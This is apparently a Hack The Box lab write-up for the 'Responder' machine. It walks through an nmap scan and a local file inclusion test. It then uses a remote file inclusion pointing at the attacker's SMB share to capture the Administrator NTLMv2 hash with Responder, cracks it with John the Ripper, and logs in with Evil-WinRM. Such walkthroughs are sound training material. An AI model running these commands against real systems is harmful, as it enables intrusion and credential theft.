HTB Responder

This is another of the HTB Starting Point boxes classified as very easy.

$ nmap -p- -min-rate 5000 10.129.225.204 –open -v

Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-10 10:09 EDT
Initiating Ping Scan at 10:09
Scanning 10.129.225.204 [2 ports]
Completed Ping Scan at 10:09, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:09
Completed Parallel DNS resolution of 1 host. at 10:09, 0.02s elapsed
Initiating Connect Scan at 10:09
Scanning 10.129.225.204 [65535 ports]
Discovered open port 80/tcp on 10.129.225.204
Discovered open port 5985/tcp on 10.129.225.204
Completed Connect Scan at 10:09, 26.38s elapsed (65535 total ports)
Nmap scan report for 10.129.225.204
Host is up (0.048s latency).
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
80/tcp   open  http
5985/tcp open  wsman

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 26.52 seconds

If we try to access to http://10.129.225.204 we’ll be redirected to http://unika.htb but we can’t see the site.

So, let’s add it to our /etc/hosts
Now we’ll obtain the correct site:

$ whatweb http://unika.htb

http://unika.htb [200 OK] Apache[2.4.52], Bootstrap, Country[RESERVED][ZZ], Email[info@unika.htb], HTML5, HTTPServer[Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1], IP[10.129.225.204], JQuery[1.11.1], OpenSSL[1.1.1m], PHP[8.1.1], Script, Title[Unika], X-Powered-By[PHP/8.1.1], X-UA-Compatible[IE=edge]

Here we can see that this site runs with php, over an Windows Apache webserver.

Checking this site, we can see that «language-change» functionality are done via «page» parameter.

http://unika.htb/index.php?page=german.html

Using this page parameter we can check if there is a LFI vulnerability.

We get:

# Copyright (c) 1993-2009 Microsoft Corp. 
# 
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows. 
# 
# This file contains the mappings of IP addresses to host names. Each 
# entry should be kept on an individual line. The IP address should 
# be placed in the first column followed by the corresponding host name. 
# The IP address and the host name should be separated by at least one 
# space. 
# 
# Additionally, comments (such as these) may be inserted on individual 
# lines or following the machine name denoted by a '#' symbol. 
# 
# For example: 
# 
# 102.54.94.97 rhino.acme.com 
# source server 
# 38.25.63.10 x.acme.com 
# x client host 
# localhost name resolution is handled within DNS itself. 
# 127.0.0.1 localhost 
# ::1 localhost

So, it is vulnerable.

We can also try if it’s vulnerable to RFI

http://unika.htb/index.php?page=\10.10.14.25\RFITest

$ sudo nc -lvnp 445

[sudo] password for kali: 
listening on [any] 445 ...
connect to [10.10.14.25] from (UNKNOWN) [10.129.225.204] 56143
E�SMBrS�����"NT LM 0.12SMB 2.002SMB 2.???

As we received a response we can confirm it is also vulnerable.

Based on the questions we are proposed, we know next tool to use is Responder.

According to its main Github site,

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

https://github.com/lgandx/Responder

Then the idea is to create a SMB server and when the machine attemps to perform the authentication, responder will take care to get the Administrator hash.

Now we can use the same previous request to try to get an authentication into the SMB server.

$ sudo responder -I tun0


  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.1.0

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

...

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : ::ffff:10.129.225.204
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::RESPONDER:45cd9466e909aeb0:52CFC2521EF92408690F6A8714CB373E:0101000000000000003FCE66477ED8012074FE3FFEEF0A3400000000020008005A0044003300460001001E00570049004E002D004700390036004E0031004E004600410048003300390004003400570049004E002D004700390036004E0031004E00460041004800330039002E005A004400330046002E004C004F00430041004C00030014005A004400330046002E004C004F00430041004C00050014005A004400330046002E004C004F00430041004C0007000800003FCE66477ED80106000400020000000800300030000000000000000100000000200000757E7073084A3D1BE1A147C896B74B66CE423125E57BDA69672EB76422B08CF70A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00320035000000000000000000

We got the NTLMv2 Administrator hash and we just need to crack it.

$ echo "Administrator::RESPONDER:45cd9466e909aeb0:52CFC2521EF92408690F6A8714CB373E:0101000000000000003FCE66477ED8012074FE3FFEEF0A3400000000020008005A0044003300460001001E00570049004E002D004700390036004E0031004E004600410048003300390004003400570049004E002D004700390036004E0031004E00460041004800330039002E005A004400330046002E004C004F00430041004C00030014005A004400330046002E004C004F00430041004C00050014005A004400330046002E004C004F00430041004C0007000800003FCE66477ED80106000400020000000800300030000000000000000100000000200000757E7073084A3D1BE1A147C896B74B66CE423125E57BDA69672EB76422B08CF70A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00320035000000000000000000" > admin.hash

As suggested we can use John the Ripper to get it.

$ john -w=/usr/share/wordlists/rockyou.txt admin.hash

Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
badminton        (Administrator)     
1g 0:00:00:00 DONE (2022-06-12 10:41) 50.00g/s 409600p/s 409600c/s 409600C/s 123456..whitetiger
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

So the password is badminton.
Administrator:badminton

Based on what we saw in the nmap recon, port 5985/tcp is open, then we can use Evil-WinRM (https://github.com/Hackplayers/evil-winrm)

$ evil-winrm -i 10.129.225.204 -u administrator -p badminton

Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>

*Evil-WinRM* PS C:\Users\mike\Desktop> type flag.txt

ea81XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *